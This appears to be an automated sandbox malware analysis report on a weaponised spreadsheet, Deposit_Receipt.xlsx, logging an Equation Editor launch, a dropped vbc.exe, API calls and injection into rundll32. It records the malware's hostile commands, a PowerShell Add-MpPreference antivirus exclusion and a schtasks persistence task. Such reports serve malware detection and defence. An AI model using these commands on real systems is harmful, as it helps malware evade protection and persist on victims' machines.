Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026CC85C	11_2_026CC85C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0275F8EE	11_2_0275F8EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_02745955	11_2_02745955
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026D69FE	11_2_026D69FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026C29B2	11_2_026C29B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0276098E	11_2_0276098E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026DEE4C	11_2_026DEE4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026F2E2F	11_2_026F2E2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026EDF7C	11_2_026EDF7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026D0F3F	11_2_026D0F3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026CCD5B	11_2_026CCD5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026F0D3B	11_2_026F0D3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0275FDDD	11_2_0275FDDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000D8C80	11_2_000D8C80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000D2D87	11_2_000D2D87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000D2D90	11_2_000D2D90

Source: C:\Users\Public\vbc.exe	Code function: String function: 00A7DF5C appears 77 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00AEF970 appears 50 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00AC373B appears 171 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00AC3F92 appears 81 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 0272F970 appears 81 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 02703F92 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 0270373B appears 238 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 026BE2A8 appears 38 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 026BDF5C appears 111 times

Source: C:\Users\Public\vbc.exe	Code function: 9_2_004185E0 NtCreateFile,	9_2_004185E0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00418690 NtReadFile,	9_2_00418690
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00418710 NtClose,	9_2_00418710
Source: C:\Users\Public\vbc.exe	Code function: 9_2_004187C0 NtAllocateVirtualMemory,	9_2_004187C0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_004185DA NtCreateFile,	9_2_004185DA
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041868A NtReadFile,	9_2_0041868A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A700C4 NtCreateFile,LdrInitializeThunk,	9_2_00A700C4
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A70078 NtResumeThread,LdrInitializeThunk,	9_2_00A70078
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A70048 NtProtectVirtualMemory,LdrInitializeThunk,	9_2_00A70048
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A707AC NtCreateMutant,LdrInitializeThunk,	9_2_00A707AC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A6F9F0 NtClose,LdrInitializeThunk,	9_2_00A6F9F0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A6F900 NtReadFile,LdrInitializeThunk,	9_2_00A6F900
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A6FAE8 NtQueryInformationProcess,LdrInitializeThunk,	9_2_00A6FAE8
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A6FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_00A6FAD0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A6FBB8 NtQueryInformationToken,LdrInitializeThunk,	9_2_00A6FBB8
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A6FB68 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_00A6FB68
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A6FC90 NtUnmapViewOfSection,LdrInitializeThunk,	9_2_00A6FC90
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A6FC60 NtMapViewOfSection,LdrInitializeThunk,	9_2_00A6FC60
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A6FD8C NtDelayExecution,LdrInitializeThunk,	9_2_00A6FD8C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A6FDC0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_00A6FDC0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A6FEA0 NtReadVirtualMemory,LdrInitializeThunk,	9_2_00A6FEA0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A6FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_00A6FED0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A6FFB4 NtCreateSection,LdrInitializeThunk,	9_2_00A6FFB4
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A710D0 NtOpenProcessToken,	9_2_00A710D0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A70060 NtQuerySection,	9_2_00A70060
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A701D4 NtSetValueKey,	9_2_00A701D4
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A7010C NtOpenDirectoryObject,	9_2_00A7010C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A71148 NtOpenThread,	9_2_00A71148
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A6F8CC NtWaitForSingleObject,	9_2_00A6F8CC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A71930 NtSetContextThread,	9_2_00A71930
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00A6F938 NtWriteFile,	9_2_00A6F938
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026B00C4 NtCreateFile,LdrInitializeThunk,	11_2_026B00C4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026B07AC NtCreateMutant,LdrInitializeThunk,	11_2_026B07AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AFAE8 NtQueryInformationProcess,LdrInitializeThunk,	11_2_026AFAE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	11_2_026AFAD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AFAB8 NtQueryValueKey,LdrInitializeThunk,	11_2_026AFAB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AFB68 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_026AFB68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AFB50 NtCreateKey,LdrInitializeThunk,	11_2_026AFB50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AFBB8 NtQueryInformationToken,LdrInitializeThunk,	11_2_026AFBB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AF900 NtReadFile,LdrInitializeThunk,	11_2_026AF900
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AF9F0 NtClose,LdrInitializeThunk,	11_2_026AF9F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	11_2_026AFED0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AFFB4 NtCreateSection,LdrInitializeThunk,	11_2_026AFFB4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AFC60 NtMapViewOfSection,LdrInitializeThunk,	11_2_026AFC60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AFDC0 NtQuerySystemInformation,LdrInitializeThunk,	11_2_026AFDC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AFD8C NtDelayExecution,LdrInitializeThunk,	11_2_026AFD8C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026B0060 NtQuerySection,	11_2_026B0060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026B0078 NtResumeThread,	11_2_026B0078
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026B0048 NtProtectVirtualMemory,	11_2_026B0048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026B10D0 NtOpenProcessToken,	11_2_026B10D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026B1148 NtOpenThread,	11_2_026B1148
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026B010C NtOpenDirectoryObject,	11_2_026B010C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026B01D4 NtSetValueKey,	11_2_026B01D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AFA50 NtEnumerateValueKey,	11_2_026AFA50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AFA20 NtQueryInformationFile,	11_2_026AFA20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AFBE8 NtQueryVirtualMemory,	11_2_026AFBE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AF8CC NtWaitForSingleObject,	11_2_026AF8CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AF938 NtWriteFile,	11_2_026AF938
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026B1930 NtSetContextThread,	11_2_026B1930
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AFE24 NtWriteVirtualMemory,	11_2_026AFE24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AFEA0 NtReadVirtualMemory,	11_2_026AFEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AFF34 NtQueueApcThread,	11_2_026AFF34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AFFFC NtCreateProcessEx,	11_2_026AFFFC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AFC48 NtSetInformationFile,	11_2_026AFC48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026B0C40 NtGetContextThread,	11_2_026B0C40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AFC30 NtOpenProcess,	11_2_026AFC30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AFC90 NtUnmapViewOfSection,	11_2_026AFC90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026AFD5C NtEnumerateKey,	11_2_026AFD5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026B1D80 NtSuspendThread,	11_2_026B1D80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000E85E0 NtCreateFile,	11_2_000E85E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000E8690 NtReadFile,	11_2_000E8690
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000E8710 NtClose,	11_2_000E8710
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000E87C0 NtAllocateVirtualMemory,	11_2_000E87C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000E85DA NtCreateFile,	11_2_000E85DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000E868A NtReadFile,	11_2_000E868A

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....................$.......r.......................0.......#.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....................$...............................0.......#.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....................$...............................0......./.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....................$...............................0......./.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....................$...............................0.......;...............\|.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....................$...............................0.......;.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......;.......................0.......G...............".......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.....................$.......V.......................0.......G.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....................................................0.......S.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....................$...............................0.......S.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_.......B.b.h.e.A.f...e.x.e.............$...............................0......._.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....................$...............................0......._.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....................$...............................0.......k.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.............................+.......................0.......k.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.............................s.......................0.......w.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................................................0.......................l.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................................................0...............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....................................................0...............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................................................0...............................................	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................0.&...............&.....(.P.....,...............................................................................................	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ubRPPGAHBbheAf.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ubRPPGAHBbheAf" /XML "C:\Users\user\AppData\Local\Temp\tmp61B1.tmp
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ubRPPGAHBbheAf.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ubRPPGAHBbheAf" /XML "C:\Users\user\AppData\Local\Temp\tmp61B1.tmp	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: vbc[1].exe.2.dr, Hz/QR.cs	Cryptographic APIs: 'CreateDecryptor'
Source: vbc[1].exe.2.dr, Hz/QR.cs	Cryptographic APIs: 'CreateDecryptor'
Source: vbc.exe.2.dr, Hz/QR.cs	Cryptographic APIs: 'CreateDecryptor'
Source: vbc.exe.2.dr, Hz/QR.cs	Cryptographic APIs: 'CreateDecryptor'
Source: ubRPPGAHBbheAf.exe.4.dr, Hz/QR.cs	Cryptographic APIs: 'CreateDecryptor'
Source: ubRPPGAHBbheAf.exe.4.dr, Hz/QR.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.vbc.exe.290000.0.unpack, Hz/QR.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.vbc.exe.290000.0.unpack, Hz/QR.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.vbc.exe.290000.0.unpack, Hz/QR.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.vbc.exe.290000.0.unpack, Hz/QR.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.0.vbc.exe.290000.5.unpack, Hz/QR.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.0.vbc.exe.290000.5.unpack, Hz/QR.cs	Cryptographic APIs: 'CreateDecryptor'

Windows Analysis Report Deposit_Receipt.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Deposit_Receipt.xlsx

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: vbc[1].exe.2.dr, rx/w4.cs	.Net Code: ehj System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: vbc.exe.2.dr, rx/w4.cs	.Net Code: ehj System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: ubRPPGAHBbheAf.exe.4.dr, rx/w4.cs	.Net Code: ehj System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.2.vbc.exe.290000.0.unpack, rx/w4.cs	.Net Code: ehj System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.vbc.exe.290000.0.unpack, rx/w4.cs	.Net Code: ehj System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 9.0.vbc.exe.290000.5.unpack, rx/w4.cs	.Net Code: ehj System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 9.0.vbc.exe.290000.3.unpack, rx/w4.cs	.Net Code: ehj System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 9.0.vbc.exe.290000.1.unpack, rx/w4.cs	.Net Code: ehj System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 9.2.vbc.exe.290000.1.unpack, rx/w4.cs	.Net Code: ehj System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 9.0.vbc.exe.290000.0.unpack, rx/w4.cs	.Net Code: ehj System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 9.0.vbc.exe.290000.9.unpack, rx/w4.cs	.Net Code: ehj System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 9.0.vbc.exe.290000.4.unpack, rx/w4.cs	.Net Code: ehj System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 9.0.vbc.exe.290000.7.unpack, rx/w4.cs	.Net Code: ehj System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 9.0.vbc.exe.290000.2.unpack, rx/w4.cs	.Net Code: ehj System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Source: vbc[1].exe.2.dr, Hz/QR.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: vbc.exe.2.dr, Hz/QR.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: ubRPPGAHBbheAf.exe.4.dr, Hz/QR.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 4.2.vbc.exe.290000.0.unpack, Hz/QR.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 4.0.vbc.exe.290000.0.unpack, Hz/QR.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 9.0.vbc.exe.290000.5.unpack, Hz/QR.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 9.0.vbc.exe.290000.3.unpack, Hz/QR.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 9.0.vbc.exe.290000.1.unpack, Hz/QR.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 9.2.vbc.exe.290000.1.unpack, Hz/QR.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 9.0.vbc.exe.290000.0.unpack, Hz/QR.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 9.0.vbc.exe.290000.9.unpack, Hz/QR.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 9.0.vbc.exe.290000.4.unpack, Hz/QR.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 9.0.vbc.exe.290000.7.unpack, Hz/QR.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 9.0.vbc.exe.290000.2.unpack, Hz/QR.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0022F1CA push 3B0022C2h; ret	4_2_0022F1D1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041B832 push eax; ret	9_2_0041B838
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041B83B push eax; ret	9_2_0041B8A2
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041B89C push eax; ret	9_2_0041B8A2
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041C8BB push esp; iretd	9_2_0041C8BC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00415135 push 8E1F8D04h; iretd	9_2_0041513C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_004153FA push ebx; retf	9_2_004153FF
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041CD7D pushfd ; ret	9_2_0041CD7E
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00405E95 push es; iretd	9_2_00405E96
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041A722 push es; ret	9_2_0041A767
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041B7E5 push eax; ret	9_2_0041B838
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_026BDFA1 push ecx; ret	11_2_026BDFB4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000E5135 push 8E1F8D04h; iretd	11_2_000E513C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000E53FA push ebx; retf	11_2_000E53FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000EA722 push es; ret	11_2_000EA767
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000EB7E5 push eax; ret	11_2_000EB838
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000EB83B push eax; ret	11_2_000EB8A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000EB832 push eax; ret	11_2_000EB838
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000EB89C push eax; ret	11_2_000EB8A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000EC8BB push esp; iretd	11_2_000EC8BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_000ECD7D pushfd ; ret	11_2_000ECD7E

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
